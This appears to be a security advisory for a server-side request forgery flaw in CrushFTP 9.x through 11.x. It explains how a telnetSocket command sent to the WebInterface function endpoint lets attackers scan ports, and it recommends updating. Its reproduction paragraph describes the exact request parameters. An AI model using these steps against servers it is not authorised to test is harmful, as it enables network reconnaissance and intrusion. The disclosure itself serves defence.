CrushFTP Server-Side Request Forgery Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in CrushFTP versions 9.x, 10.x prior to 10.8.4, and 11.x prior to 11.3.1. The vulnerability allows attackers to manipulate host and port parameters in a 'command=telnetSocket' request to the '/WebInterface/function/' URI, enabling them to scan remote ports. The issue arises because the application does not properly validate or restrict these parameters, allowing for unauthorized network interactions.

Impact

Exploitation of this vulnerability allows for server-side request forgery, where an attacker can make the server send requests to internal or external resources, potentially leading to unauthorized access or information disclosure.

Reproduction

To reproduce this vulnerability, send a POST request to 'http://<target>:<port>/WebInterface/function/' with the 'command' parameter set to 'telnetSocket', and include the 'host' and 'port' parameters to specify the target for the telnet connection. The response will indicate whether the connection was successful or refused, demonstrating the ability to scan ports remotely.

Remediation

Users are advised to update to the latest version of CrushFTP.